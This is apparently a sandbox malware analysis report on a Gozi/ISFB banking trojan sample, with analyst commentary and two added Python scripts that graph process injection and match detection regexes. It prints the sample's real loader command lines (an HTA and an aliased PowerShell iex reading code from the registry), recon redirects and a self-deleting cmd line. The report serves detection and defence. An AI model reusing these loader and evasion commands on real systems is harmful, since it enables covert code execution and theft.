Malware Analysis Report

2025-08-11 01:44

Sample ID 230308-tqh2xadh7z
Target t.tgz
SHA256 1b0194d033b65fbc9dc1955c10395fff4d0943bc0e1e54a92b7c36119a7c051f
Tags
gozi 20007 banker isfb trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V6
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

1b0194d033b65fbc9dc1955c10395fff4d0943bc0e1e54a92b7c36119a7c051f

Threat Level: Known bad

The file t.tgz was found to be: Known bad.

Malicious Activity Summary

gozi 20007 banker isfb trojan

Gozi

Blocklisted process makes network request

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Runs net.exe

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious behavior: CmdExeWriteProcessMemorySpam

Runs ping.exe

Discovers systems in the same network

Gathers system information

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-03-08 16:16

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-03-08 16:15

Reported

2023-03-08 16:18

Platform

win10v2004-20230220-en

Max time kernel

150s

Max time network

153s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi

banker trojan gozi

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4208 set thread context of 804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 804 set thread context of 3772 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 set thread context of 3440 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 set thread context of 1344 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 804 set thread context of 4112 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 set thread context of 2232 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1344 set thread context of 3184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 804 set thread context of 4844 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Process                                                     Events
C:\Windows\SysWOW64\rundll32.exe                            2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   2
C:\Windows\Explorer.EXE                                     60

Suspicious behavior: MapViewOfSection

Process                                                     Events
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   1
C:\Windows\Explorer.EXE                                     6
C:\Windows\System32\cmd.exe                                 1

Suspicious use of AdjustPrivilegeToken

Process                                                     Token                          Events
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   SeDebugPrivilege               1
C:\Windows\Explorer.EXE                                     SeShutdownPrivilege            4
C:\Windows\Explorer.EXE                                     SeCreatePagefilePrivilege      4
C:\Windows\System32\Wbem\WMIC.exe                           SeIncreaseQuotaPrivilege       2
C:\Windows\System32\Wbem\WMIC.exe                           SeSecurityPrivilege            2
C:\Windows\System32\Wbem\WMIC.exe                           SeTakeOwnershipPrivilege       2
C:\Windows\System32\Wbem\WMIC.exe                           SeLoadDriverPrivilege          2
C:\Windows\System32\Wbem\WMIC.exe                           SeSystemProfilePrivilege       2
C:\Windows\System32\Wbem\WMIC.exe                           SeSystemtimePrivilege          2
C:\Windows\System32\Wbem\WMIC.exe                           SeProfSingleProcessPrivilege   2
C:\Windows\System32\Wbem\WMIC.exe                           SeIncBasePriorityPrivilege     2
C:\Windows\System32\Wbem\WMIC.exe                           SeCreatePagefilePrivilege      2
C:\Windows\System32\Wbem\WMIC.exe                           SeBackupPrivilege              2
C:\Windows\System32\Wbem\WMIC.exe                           SeRestorePrivilege             2
C:\Windows\System32\Wbem\WMIC.exe                           SeShutdownPrivilege            2
C:\Windows\System32\Wbem\WMIC.exe                           SeDebugPrivilege               2
C:\Windows\System32\Wbem\WMIC.exe                           SeSystemEnvironmentPrivilege   2
C:\Windows\System32\Wbem\WMIC.exe                           SeRemoteShutdownPrivilege      2
C:\Windows\System32\Wbem\WMIC.exe                           SeUndockPrivilege              2
C:\Windows\System32\Wbem\WMIC.exe                           SeManageVolumePrivilege        2
C:\Windows\System32\Wbem\WMIC.exe                           33                             2
C:\Windows\System32\Wbem\WMIC.exe                           34                             2
C:\Windows\System32\Wbem\WMIC.exe                           35                             2
C:\Windows\System32\Wbem\WMIC.exe                           36                             2

Rows are merged by process and token; Events is the number of identical rows the sandbox listed. The four numeric tokens are privilege LUIDs the sandbox did not resolve to names; the WMIC.exe list is in ascending LUID order, and 33 to 36 are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege and SeDelegateSessionUserImpersonatePrivilege. That block, recorded twice, is the whole privilege set of the token being enabled at once, which the WMI client does on its own whenever wmic.exe runs; it is not an action of the sample's code. The row that matters is powershell.exe, the process that goes on to write into Explorer.EXE (see the WriteProcessMemory table below), enabling SeDebugPrivilege.

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Events  Description                       Process -> Target
3       PID 560 wrote to memory of 4324   C:\Windows\system32\rundll32.exe -> C:\Windows\SysWOW64\rundll32.exe
2       PID 4364 wrote to memory of 4208  C:\Windows\System32\mshta.exe -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2       PID 4208 wrote to memory of 1084  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
2       PID 1084 wrote to memory of 2408  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
2       PID 4208 wrote to memory of 2652  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
2       PID 2652 wrote to memory of 2008  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
4       PID 4208 wrote to memory of 804   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> C:\Windows\Explorer.EXE
4       PID 804 wrote to memory of 3772   C:\Windows\Explorer.EXE -> C:\Windows\System32\RuntimeBroker.exe
5       PID 804 wrote to memory of 1344   C:\Windows\Explorer.EXE -> C:\Windows\System32\cmd.exe
4       PID 804 wrote to memory of 3440   C:\Windows\Explorer.EXE -> C:\Windows\System32\RuntimeBroker.exe
4       PID 804 wrote to memory of 4112   C:\Windows\Explorer.EXE -> C:\Windows\System32\RuntimeBroker.exe
4       PID 804 wrote to memory of 2232   C:\Windows\Explorer.EXE -> C:\Windows\System32\RuntimeBroker.exe
5       PID 1344 wrote to memory of 3184  C:\Windows\System32\cmd.exe -> C:\Windows\system32\PING.EXE
2       PID 804 wrote to memory of 2092   C:\Windows\Explorer.EXE -> C:\Windows\system32\cmd.exe
6       PID 804 wrote to memory of 4844   C:\Windows\Explorer.EXE -> C:\Windows\syswow64\cmd.exe
2       PID 2092 wrote to memory of 2528  C:\Windows\system32\cmd.exe -> C:\Windows\System32\Wbem\WMIC.exe
2       PID 2092 wrote to memory of 1592  C:\Windows\system32\cmd.exe -> C:\Windows\system32\more.com
2       PID 804 wrote to memory of 2544   C:\Windows\Explorer.EXE -> C:\Windows\system32\cmd.exe
2       PID 804 wrote to memory of 208    C:\Windows\Explorer.EXE -> C:\Windows\system32\cmd.exe
2       PID 208 wrote to memory of 2312   C:\Windows\system32\cmd.exe -> C:\Windows\system32\systeminfo.exe
2       PID 804 wrote to memory of 1944   C:\Windows\Explorer.EXE -> C:\Windows\system32\cmd.exe
1       PID 804 wrote to memory of 2732   C:\Windows\Explorer.EXE -> C:\Windows\system32\cmd.exe

Rows are merged by source and target pid; Events is the number of identical rows the sandbox listed (64 in total). CreateProcess itself writes into a freshly created child, so a parent-to-child row on its own (csc.exe -> cvtres.exe, cmd.exe -> more.com) is not evidence of injection. What is: powershell.exe (4208) writing into Explorer.EXE (804), the desktop shell it did not create, and then setting its thread context (see the SetThreadContext table above); and Explorer.EXE in turn writing into and setting the thread context of four RuntimeBroker.exe instances (3772, 3440, 4112, 2232) and two cmd.exe instances (1344, 4844), with cmd.exe 1344 repeating the pattern on PING.EXE (3184).
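The SetThreadContext and WriteProcessMemory tables above list one row per intercepted API call, so the structure (who wrote into whom, and which of those writes were followed by a thread-context change from the same process) is easy to lose in the repetition. The script below is an added example, not part of the sandbox report, that parses rows in exactly this format into a graph, prints the write tree under each root, walks a chain back to its origin, and lists the pids that one source both wrote into and SetThreadContext'ed, the combination that separates thread hijacking or hollowing from the write CreateProcess itself performs into a new child. The embedded rows are a verbatim subset of the report's tables; pids and image paths are the report's own and nothing else is assumed. The candidate list also contains the children the injected processes spawn (cmd.exe 1344, PING.EXE 3184), which fits the Files section: a region of the same size, 0xA3000 bytes, was dumped from Explorer.EXE (804) and from each of 3772, 3440, 1344, 4112, 2232 and 3184.

```python
import re
from collections import Counter, defaultdict

# Constructed input: a verbatim subset of the rows in this report's
# "Suspicious use of WriteProcessMemory" and "Suspicious use of SetThreadContext"
# tables (behavioral2). The sandbox prints one row per API call, so rows repeat.
REPORT_ROWS = r"""
PID 560 wrote to memory of 4324 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4364 wrote to memory of 4208 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4208 wrote to memory of 1084 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1084 wrote to memory of 2408 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4208 wrote to memory of 804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 804 wrote to memory of 3772 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 1344 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 804 wrote to memory of 3440 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 4112 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 2232 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1344 wrote to memory of 3184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1344 wrote to memory of 3184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 804 wrote to memory of 2092 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 804 wrote to memory of 4844 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2092 wrote to memory of 2528 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4208 set thread context of 804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 804 set thread context of 3772 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 set thread context of 3440 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 set thread context of 1344 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 804 set thread context of 4112 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 set thread context of 2232 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1344 set thread context of 3184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 804 set thread context of 4844 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
"""

ROW_RE = re.compile(r"^PID (\d+) (wrote to memory of|set thread context of) (\d+) N/A (\S+) (\S+)$", re.M)


def parse_rows(text):
    """Return (images, writes, ctx): pid -> image path, plus two Counters keyed by
    (src_pid, dst_pid) for WriteProcessMemory and SetThreadContext events."""
    images, writes, ctx = {}, Counter(), Counter()
    for m in ROW_RE.finditer(text):
        src, kind, dst, src_img, dst_img = m.groups()
        src, dst = int(src), int(dst)
        images[src], images[dst] = src_img, dst_img
        (writes if kind.startswith("wrote") else ctx)[(src, dst)] += 1
    return images, writes, ctx


def writer_of(writes):
    """Map each written-into pid to the pid that wrote into it (first writer wins)."""
    parent = {}
    for src, dst in writes:
        parent.setdefault(dst, src)
    return parent


def roots(writes):
    """Pids that wrote into others but were never written into themselves."""
    parent = writer_of(writes)
    return sorted({src for src, _ in writes if src not in parent})


def chain_to_root(pid, writes):
    """Follow write edges upward from pid; returns the chain root-first."""
    parent, chain = writer_of(writes), [pid]
    while chain[-1] in parent and parent[chain[-1]] not in chain:  # cycle guard
        chain.append(parent[chain[-1]])
    return chain[::-1]


def hollowing_candidates(writes, ctx):
    """Pids that one source both wrote into and SetThreadContext'ed. A write alone
    proves little (CreateProcess writes into every new child); write plus a
    thread-context change from the same source is the thread-hijack/hollowing shape."""
    return sorted(dst for (src, dst) in ctx if (src, dst) in writes)


def render_tree(root, images, writes, ctx):
    """Indented text tree of write edges below root, with event counts per edge."""
    children = defaultdict(list)
    for src, dst in writes:
        children[src].append(dst)
    lines = []

    def walk(pid, depth, tag):
        lines.append("  " * depth + f"{pid} {images.get(pid, '?')}{tag}")
        for child in children[pid]:
            edge = f"  [writes={writes[(pid, child)]}"
            if (pid, child) in ctx:
                edge += f", set_thread_context={ctx[(pid, child)]}"
            walk(child, depth + 1, edge + "]")

    walk(root, 0, "")
    return lines


if __name__ == "__main__":
    images, writes, ctx = parse_rows(REPORT_ROWS)
    for r in roots(writes):
        print("\n".join(render_tree(r, images, writes, ctx)))
    print("write chain to PING.EXE (3184):", chain_to_root(3184, writes))
    print("hollowing candidates:", hollowing_candidates(writes, ctx))
```

Run as-is it prints two trees, one rooted at the 64-bit rundll32.exe (560) and one at mshta.exe (4364); paste in the full tables, or a Sysmon export reshaped into the same row format, to get the complete graph.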

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll,#1

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll,#1

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Igxu='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Igxu).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EB212225-4E4E-5501-B04F-6259E4F3B69D\\\BookVirtual'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxvvjkglf -value gp; new-alias -name sabpvj -value iex; sabpvj ([System.Text.Encoding]::ASCII.GetString((jxvvjkglf "HKCU:Software\AppDataLow\Software\Microsoft\EB212225-4E4E-5501-B04F-6259E4F3B69D").FolderProcess))

Both of these stages load their code from the registry rather than from a file: the inline HTA reads the BookVirtual value and evals it, and the PowerShell one-liner (gp and iex hidden behind random aliases) reads the binary FolderProcess value, converts it to a string and runs it, both under HKCU\Software\AppDataLow\Software\Microsoft\EB212225-4E4E-5501-B04F-6259E4F3B69D. That key is the host artifact to collect on a live machine, together with C:\Users\Admin\AppData\Local\Temp\EBE4.bin1, which receives the output of the recon commands further down. The csc.exe and cvtres.exe runs that follow, and the q0qstetp and wir3sxsr temporary directories in the Files section, are the footprint of PowerShell compiling C# on the fly (the Add-Type pattern).

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q0qstetp\q0qstetp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6BD4.tmp" "c:\Users\Admin\AppData\Local\Temp\q0qstetp\CSC7182A83187C14DADB55CBFCD9FAEFCE.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wir3sxsr\wir3sxsr.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6CCE.tmp" "c:\Users\Admin\AppData\Local\Temp\wir3sxsr\CSC26E5B873B3C14D448ECCD3F23066F5F6.TMP"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll"

C:\Windows\system32\PING.EXE

ping localhost -n 5

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"

C:\Windows\system32\net.exe

net view
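The process list above is, in effect, a sequence of command lines, and each stage has a shape that can be matched in process-creation telemetry (Sysmon event 1, an EDR process feed) without any file hash. The following is an added example, not part of the report, of five such rules written as Python regexes and run over the report's own command lines plus two constructed benign lines; the rule names and patterns are this example's own and generalize a little beyond this sample (any Temp-path DLL loaded by ordinal, any alias for iex or Invoke-Expression, any .bin output file under Temp). Images are matched on the basename so the SysWOW64 copies are caught as well.

```python
import re
from collections import Counter

# Constructed sample input: (image path, command line) pairs copied from this
# report's behavioral2 "Processes" section, plus two benign lines (marked) that
# are not from the report and exist only to show the rules stay quiet on them.
SAMPLE_EVENTS = [
    (r"C:\Windows\system32\rundll32.exe",
     r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll,#1"),
    (r"C:\Windows\SysWOW64\rundll32.exe",
     r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll,#1"),
    (r"C:\Windows\System32\mshta.exe",
     r'''"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Igxu='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Igxu).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EB212225-4E4E-5501-B04F-6259E4F3B69D\\\BookVirtual'));if(!window.flag)close()</script>"'''),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxvvjkglf -value gp; new-alias -name sabpvj -value iex; sabpvj ([System.Text.Encoding]::ASCII.GetString((jxvvjkglf "HKCU:Software\AppDataLow\Software\Microsoft\EB212225-4E4E-5501-B04F-6259E4F3B69D").FolderProcess))'''),
    (r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     r'''"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q0qstetp\q0qstetp.cmdline"'''),
    (r"C:\Windows\System32\cmd.exe",
     r'''"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll"'''),
    (r"C:\Windows\system32\PING.EXE", r"ping localhost -n 5"),
    (r"C:\Windows\system32\cmd.exe",
     r'''cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"'''),
    (r"C:\Windows\syswow64\cmd.exe", r'''"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,'''),
    (r"C:\Windows\system32\cmd.exe", r'''cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"'''),
    (r"C:\Windows\system32\cmd.exe", r'''cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"'''),
    (r"C:\Windows\system32\cmd.exe", r'''cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"'''),
    # benign lines (constructed, not from the report): the rules must not fire on these
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"powershell.exe -NoProfile -Command Get-Process"),
    (r"C:\Windows\System32\cmd.exe", r"cmd.exe /C ping localhost -n 1"),
]

# (rule name, image basename pattern, command-line pattern); all matched case-insensitively.
RULES = [
    ("rundll32_temp_dll_by_ordinal", r"rundll32\.exe",
     r"\\AppData\\Local\\Temp\\[^\s,]+\.dll,#\d+"),
    ("mshta_inline_hta_regread", r"mshta\.exe",
     r"about:<hta:application>.*\bregread\("),
    ("powershell_alias_iex_registry", r"powershell\.exe",
     r"new-alias[^;]*-value\s+(iex|invoke-expression)\b.*AppDataLow"),
    ("recon_to_temp_bin", r"cmd\.exe",
     r"\b(wmic\s+computersystem\s+get\s+domain|systeminfo|net\s+view)\b.*>>?\s*\S*\\Temp\\\S+\.bin\d*"),
    ("ping_delay_then_self_delete", r"cmd\.exe",
     r"\bping\s+(localhost|127\.0\.0\.1)\s+-n\s+\d+\s*&&\s*del\b"),
]
COMPILED = [(name, re.compile(img, re.I), re.compile(cmd, re.I)) for name, img, cmd in RULES]


def detect(events):
    """Return [(rule, image basename, command line)] for every rule each event trips."""
    hits = []
    for image, cmdline in events:
        basename = image.rsplit("\\", 1)[-1]
        for name, img_re, cmd_re in COMPILED:
            if img_re.fullmatch(basename) and cmd_re.search(cmdline):
                hits.append((name, basename, cmdline))
    return hits


def summarize(hits):
    """Rule name -> number of events it fired on."""
    return dict(Counter(name for name, _, _ in hits))


if __name__ == "__main__":
    for name, basename, cmdline in detect(SAMPLE_EVENTS):
        print(f"{name:32} {basename:16} {cmdline[:70]}")
    print(summarize(detect(SAMPLE_EVENTS)))
```

On the report's lines the five rules fire eight times (both rundll32 copies, the HTA, the PowerShell loader, the three recon redirects and the ping-then-del self-delete) and stay silent on the bare ping, the echo separators, the csc.exe compile and the two benign lines. The recon rule is the one most likely to need tuning in production, since the .bin1 name is specific to this run; the wmic/systeminfo/net view triplet redirected to one file under Temp is the durable part.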

Network

Country  Destination         Domain                                  Proto
US       8.8.8.8:53          14.110.152.52.in-addr.arpa              udp
US       8.8.8.8:53          196.249.167.52.in-addr.arpa             udp
US       8.8.8.8:53          199.176.139.52.in-addr.arpa             udp
US       8.8.8.8:53          2.159.190.20.in-addr.arpa               udp
US       8.8.8.8:53          58.104.205.20.in-addr.arpa              udp
US       8.8.8.8:53          232.168.11.51.in-addr.arpa              udp
US       8.8.8.8:53          58.104.205.20.in-addr.arpa              udp
US       8.8.8.8:53          62.13.109.52.in-addr.arpa               udp
US       8.8.8.8:53          trackingg-protectioon.cdn4.mozilla.net  udp
US       8.8.8.8:53          97.238.32.23.in-addr.arpa               udp
US       8.8.8.8:53          95.221.229.192.in-addr.arpa             udp
US       209.197.3.8:80      -                                       tcp
US       35.190.80.1:443     -                                       tcp
GB       185.158.250.165:80  185.158.250.165                         tcp
US       8.8.8.8:53          164.2.77.40.in-addr.arpa                udp
US       8.8.8.8:53          165.250.158.185.in-addr.arpa            udp
US       8.8.8.8:53          0.204.248.87.in-addr.arpa               udp
US       8.8.8.8:53          trackingg-protectioon.cdn4.mozilla.net  udp

This view does not attribute traffic to a process, so the reverse (in-add.arpa) lookups of cloud and CDN address space cannot be separated here from the background traffic an idle Windows sandbox VM also produces; do not lift them into an indicator list wholesale. The rows to check against the pcap are the three direct TCP connections (two to port 80 by bare IP, one to port 443) and the misspelled mozilla.net subdomain (trackingg-protectioon), which was queried twice.

Files

memory/4324-133-0x00000000027A0000-0x00000000037A0000-memory.dmp

memory/4324-134-0x0000000015570000-0x0000000015576000-memory.dmp

memory/4324-135-0x00000000027A0000-0x00000000037A0000-memory.dmp

memory/4324-136-0x0000000015BE0000-0x0000000015BED000-memory.dmp

memory/4324-139-0x00000000027A0000-0x00000000037A0000-memory.dmp

memory/4364-152-0x00000276D6D60000-0x00000276D7217000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cmdq1qgp.ble.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4208-153-0x000001ACF0C00000-0x000001ACF0C22000-memory.dmp

memory/4208-163-0x000001ACF0B50000-0x000001ACF0B60000-memory.dmp

memory/4208-164-0x000001ACF0B50000-0x000001ACF0B60000-memory.dmp

memory/4208-165-0x000001ACF0B50000-0x000001ACF0B60000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\q0qstetp\q0qstetp.cmdline

MD5 651b587b5ceb1707927636685e4ed93d
SHA1 c5fa9322420b56de83e10579591f7afa993f2c63
SHA256 bbfed94d61c6f521f827e33e4a8039d1b9fa389e452dc89577f9895609ecac85
SHA512 a5829cacf2496ffafa76c98628367dfea3ef49fad34d544d89206cdd26ed2154cb509fca46d1f9fb98e4633e25c24b11c94935b6efcc8be160c1436273ac8075

\??\c:\Users\Admin\AppData\Local\Temp\q0qstetp\q0qstetp.0.cs

MD5 bd49a7184d9437c2fc1f479f064cd629
SHA1 cbc187f4d9c71eea6ceef8b6f6584456df0ed97e
SHA256 d9193d05e3439096314ed9a7b47a04e7afb4eefe34601ad3f21afe7db216742a
SHA512 2655a3043c23ed39dcb88615084c5897b8ba7c36a19d52d650c6122e7bcfab7056f52c0f7a89131db8972b9285e15e2cbddd4216129df02855ce0ef87da8cce3

\??\c:\Users\Admin\AppData\Local\Temp\q0qstetp\CSC7182A83187C14DADB55CBFCD9FAEFCE.TMP

MD5 d6d9d005784a43d7eae3543c940d7d35
SHA1 6cabd66e35da5e7f8a84bfdf279758088c042ba6
SHA256 7a7e47da28fa5ffd1bfc22ca42900708d00920bd8b1eb6c52fcf4998cccceadb
SHA512 7a4829719e015beb891727113e730b462a53017330bdbe47f430486183d87eed63c09130903aed4aec7c256df03542cf61b7f4387ae0980de24459ea501e2696

C:\Users\Admin\AppData\Local\Temp\RES6BD4.tmp

MD5 2d2bf756ae4c3bcb58f64fdb0b1a86b3
SHA1 d3bed8129c1c4f63a6151c4acfbe27b3d4011725
SHA256 de7f99a3727649978aa58ae043c159f2ef832f3e57e584f0d2441c8d564eba82
SHA512 06fd5e270f66322da9dd7eb964cf02974389eae387e991d076dfa86824ecad4443bf185abe52ef4f9a6793f99c95bc5f438c6ae9599da970954d59e6a820012d

C:\Users\Admin\AppData\Local\Temp\q0qstetp\q0qstetp.dll

